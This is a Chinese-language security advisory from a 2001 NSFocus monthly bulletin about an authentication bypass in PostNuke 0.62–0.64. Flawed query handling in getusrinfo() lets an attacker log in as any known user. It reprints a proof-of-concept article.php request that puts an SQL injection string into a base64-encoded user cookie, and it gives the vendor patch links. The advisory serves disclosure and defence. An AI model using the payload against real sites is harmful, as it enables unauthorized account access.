首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第27期->最新漏洞
期刊号: 类型: 关键词:
PostNuke 未授权的用户登陆漏洞

日期:2001-11-08

受影响的系统:  
PostNuke 0.62
PostNuke 0.63
PostNuke 0.64
   - Apache Group Apache 1.3.20
   - Apache Group Apache 1.3.20win32
描述:
--------------------------------------------------------------------------------


BUGTRAQ ID : 3435

PostNuke是在PHPNuke的基础上改进的内容管理系统,发现其0.62到0.64版本存在一个
安全漏洞,导致远程攻击者只要知道用户名和用户ID即可不经过认证就登陆进入系统。

“article.php”调用“mainfile2.php”中的一个函数“getusrinfo()”更新用户信
息, 该函数进行了一次数据库查询,但是由于该查询使用了一个不安全的变量,导致
攻击者可能改变这个查询串,从而绕过认证直接进入系统。

<*来源:Magnus Skjegstad (lists@skjegstad.com)
  参考:http://archives.neohapsis.com/archives/bugtraq/2001-10/0088.html
*>


测试程序:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!



Magnus Skjegstad (lists@skjegstad.com)提供了如下测试代码:

article.php?save=1&
sid=20&      [any sid will do..]
cookieusrtime=160000&     [to get a decent expire-date on the cookie]
user=USERID:USERNAME:'  or uname='USERNAME      [base64_encoded]



--------------------------------------------------------------------------------
建议:

厂商补丁:

目前厂商已经发布了补丁程序,请到厂商的主页下载:
http://prdownloads.sourceforge.net/post-nuke/64Mutant_Fix_article.zip
您也可以在厂商主页上升级到最新版本:
https://sourceforge.net/projects/post-nuke/

版权所有,未经许可,不得转载